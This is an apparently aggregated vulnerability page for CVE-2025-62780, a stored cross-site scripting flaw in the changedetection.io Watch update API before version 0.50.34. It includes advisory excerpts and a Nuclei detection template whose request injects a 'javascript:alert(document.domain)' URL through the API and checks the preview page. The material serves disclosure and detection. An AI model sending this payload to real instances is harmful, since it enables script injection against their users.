CVE-2025-62780
published 2025-11-10CVE-2025-62780: changedetection.io is a free open source web page change detection tool. A Stored Cross Site Scripting is present in changedetection.io Watch update API in…
PriorityP335medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EXPLOIT
EPSS
0.40%
32.0th percentile
changedetection.io is a free open source web page change detection tool. A Stored Cross Site Scripting is present in changedetection.io Watch update API in versions prior to 0.50.34 due to insufficient security checks. Two scenarios are possible. In the first, an attacker can insert a new watch with an arbitrary URL which really points to a web page. Once the HTML content is retrieved, the attacker updates the URL with a JavaScript payload. In the second, an attacker substitutes the URL in an existing watch with a new URL that is in reality a JavaScript payload. When the user clicks on *Preview* and then on the malicious link, the JavaScript malicious code is executed. Version 0.50.34 fixes the issue.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| changedetection | changedetection | < 0.50.34 | 0.50.34 |
| dgtlmoon | changedetection.io | < 0.50.34 | 0.50.34 |
| dgtlmoon | changedetection.io | >= 0 < 0.50.34 | 0.50.34 |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
changedetection.io: Stored XSS in Watch update via API
osv·2025-11-12
CVE-2025-62780 [LOW] changedetection.io: Stored XSS in Watch update via API
changedetection.io: Stored XSS in Watch update via API
### Summary
A Stored Cross Site Scripting is present in the changedetection.io Watch update API due to unsufficient security checks.
### Details
Tested on changedetection.io version *v0.50.24*
```console
REPOSITORY TAG IMAGE ID CREATED SIZE
ghcr.io/dgtlmoon/changedetection.io latest 0367276509a0 23 hours ago 599MB
```
When a user tries to add an unsafe URL as a Watch in the changedetection.io UI, the action is blocked with the error message "Watch protocol is not permitted by SAFE_PROTOCOL_REGEX or incorrect URL format".
This is catched by the function `validate_url(test_url)`.
```python
def validate_url(test_url):
# ...
from .model.Watch import is_safe_url
if not is_safe_url(test_url):
# This should be wtforms.validators.
raise
GHSA
changedetection.io: Stored XSS in Watch update via API
ghsa·2025-11-12
CVE-2025-62780 [LOW] CWE-79 changedetection.io: Stored XSS in Watch update via API
changedetection.io: Stored XSS in Watch update via API
### Summary
A Stored Cross Site Scripting is present in the changedetection.io Watch update API due to unsufficient security checks.
### Details
Tested on changedetection.io version *v0.50.24*
```console
REPOSITORY TAG IMAGE ID CREATED SIZE
ghcr.io/dgtlmoon/changedetection.io latest 0367276509a0 23 hours ago 599MB
```
When a user tries to add an unsafe URL as a Watch in the changedetection.io UI, the action is blocked with the error message "Watch protocol is not permitted by SAFE_PROTOCOL_REGEX or incorrect URL format".
This is catched by the function `validate_url(test_url)`.
```python
def validate_url(test_url):
# ...
from .model.Watch import is_safe_url
if not is_safe_url(test_url):
# This should be wtforms.validators.
raise
No detection rules found.
Nuclei
ChangeDetection.io <= v0.50.33 - Stored XSS via Watch API
nuclei·CVSS 5.4
CVE-2025-62780 [MEDIUM] ChangeDetection.io <= v0.50.33 - Stored XSS via Watch API
ChangeDetection.io v([0-9.]+)([a-f0-9]+)'
- raw:
- |
PUT /api/v1/watch/{{watch_uuid}} HTTP/1.1
Host: {{Hostname}}
x-api-key: {{api_key}}
Content-Type: application/json
{"url":"javascript:alert(document.domain)","title":"{{string}}","paused":true}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "OK")'
condition: and
internal: true
- raw:
- |
GET /preview/{{watch_uuid}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "javascript:alert(document.domain)", "{{string}}")'
condition: and
# digest: 4a0a0047304502205492d41a04eac00c7905c6518c7762edb2d79f190eee56cbeae3957513b12d46022100f6da2ef1795e8fe4ad30d1c475f86fb1af8d5d1c977b5a26d18183d12ecf3be4:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2025-11-10
Published